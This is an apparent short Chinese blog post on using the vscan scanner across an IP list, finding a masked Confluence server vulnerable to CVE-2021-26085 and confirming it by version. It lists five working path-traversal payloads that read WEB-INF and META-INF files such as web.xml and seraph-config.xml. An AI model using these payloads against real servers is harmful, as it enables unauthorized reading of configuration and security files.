用vscan扫描IP清单,发现一个confluence小漏洞。
https://github.com/veo/vscan
http://***.***.***.***:9090 [200] [主页面 - PBconfluence] [Atlassian Confluence,Confluence,Java,fisheye] [2737] [FileFuzz: "GoPOC_confluence|CVE_2021_26085","poc-yaml-confluence-cve-2021-26085-arbitrary-file-read","NucleiPOC_CVE-2021-26085"]
这里有5条POC测试路径。
/s/123cfx/_/;/WEB-INF/web.xml
/s/123cfx/_/;/WEB-INF/decorators.xml
/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
用这个测试一下看看,路径直接跟到网站http://***.***.***.***:9090后面。
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
测试的这个网站基于Atlassian Confluence 6.13.23 技术构建,版本小于7.4.10,所以存在漏洞。
漏洞基本情况如下:
https://avd.aliyun.com/detail?id=AVD-2021-26085
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
